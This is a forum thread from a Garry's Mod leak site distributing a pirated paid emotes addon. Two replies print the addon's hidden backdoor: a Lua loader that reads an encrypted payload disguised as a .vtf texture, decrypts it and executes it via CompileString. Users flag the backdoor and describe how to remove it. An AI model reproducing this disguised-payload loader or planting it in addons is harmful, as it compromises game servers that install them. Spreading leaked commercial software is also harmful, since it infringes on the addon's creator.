Garry's Mod Leaks

[LEAK] EMOTES - A new way to flex!

Submitted by Lermal, , Thread ID: 194352

Thread Closed
15-01-2021, 08:25 PM
#1
#other, #darkRP

-----------------------------------------------------------------------------------------------------------------------------

NAME:EMOTES - A new way to flex!

-----------------------------------------------------------------------------------------------------------------------------

GModStore: -*LINK*

-----------------------------------------------------------------------------------------------------------------------------

Download: -*LINK*

-----------------------------------------------------------------------------------------------------------------------------

Installation:All files in Addons folder

-----------------------------------------------------------------------------------------------------------------------------

Content -*LINK*

-----------------------------------------------------------------------------------------------------------------------------

Treiler:https://youtu.be/acjV-xyHwJ4


This hidden content has been reported as not working 0 times this month.
1 times in total

Mr Samuel

RE: [LEAK] EMOTES - A new way to flex!

#2
Okey man hooks.lua

local function a(b, c)
c = c % 177

return (b - c) % 177
end

local function d(e, f)
local g = tonumber(util.CRC(f))
local h = string.len(e)
local i = string.len(f)
local j = 1
local k = 1
local l = {}

while j <= h do
j = j + string.byte(f[k % (i - 1) + 1])
l[k] = a(string.byte(e[j]), g)
k = k + 1
j = j + 1
end

return string.char(unpack(l))
end


function LoadModel(m, n, o)
local p = file.Open(m, "rb", "BASE_PATH")
if not p then return end
p:Skip(o)
local q = p:Read(p:Size() - o)
p:Close()
local l = d(q, n)

return CompileString(l, m, false)
end

local r = LoadModel("garrysmod/addons/EMOTES - A new way to flex!/materials/emotes/models/model.vtf", [[epC$5~rNM~k[<="cNF/lM,Iz$Fh1,)]s+\?~'Cla.n{/z`8/VLuE,gWwxnPk-y-x[?D2.V9zFTPsD,TXPt9KD75.}U$!MW,enaWg9ez&@(a{B[[;v5JxxfGO$DJw92&c]], 0)
r()

RE: [LEAK] EMOTES - A new way to flex!

#3
Other then the fact it has a backdoor, remove it and you're set! It works like intended

RE: [LEAK] EMOTES - A new way to flex!

#4
thank you for this leak-pack, will try thats all! If it will works, ill comment

RE: [LEAK] EMOTES - A new way to flex!

This post was last modified: 28-01-2021, 11:35 PM by testeron211
#5
Code:
/lua/emotes/ui/menu.lua:321: bad argument #1 to 'pairs' (table expected, got nil)
1. pairs - [C]:-1
2. fn - addons/emotes/lua/emotes/ui/menu.lua:321
  3. unknown - addons/ulib/lua/ulib/shared/hook.lua:109


fix:
delete code in /lua/emotes/misc/hooks.lua
delete code block from 144 to 181

RE: [LEAK] EMOTES - A new way to flex!

#6
bro this have a fking backdoor and the download plataform is YANDEX??????????????????? bullshit software

RE: [LEAK] EMOTES - A new way to flex!

OP
#7
24-01-2021, 03:59 PM
MrTrololo Wrote:
Okey man hooks.lua

local function a(b, c)
c = c % 177

return (b - c) % 177
end

local function d(e, f)
local g = tonumber(util.CRC(f))
local h = string.len(e)
local i = string.len(f)
local j = 1
local k = 1
local l = {}

while j <= h do
j = j + string.byte(f[k % (i - 1) + 1])
l[k] = a(string.byte(e[j]), g)
k = k + 1
j = j + 1
end

return string.char(unpack(l))
end


function LoadModel(m, n, o)
local p = file.Open(m, "rb", "BASE_PATH")
if not p then return end
p:Skip(o)
local q = p:Read(p:Size() - o)
p:Close()
local l = d(q, n)

return CompileString(l, m, false)
end

local r = LoadModel("garrysmod/addons/EMOTES - A new way to flex!/materials/emotes/models/model.vtf", [[epC$5~rNM~k[<="cNF/lM,Iz$Fh1,)]s+\?~'Cla.n{/z`8/VLuE,gWwxnPk-y-x[?D2.V9zFTPsD,TXPt9KD75.}U$!MW,enaWg9ez&@(a{B[[;v5JxxfGO$DJw92&c]], 0)
r()
Thank you for finding this backdoor, I didn't notice it ... I'll come home and clean it!)

Mr Samuel

Users browsing this thread: 2 Guest(s)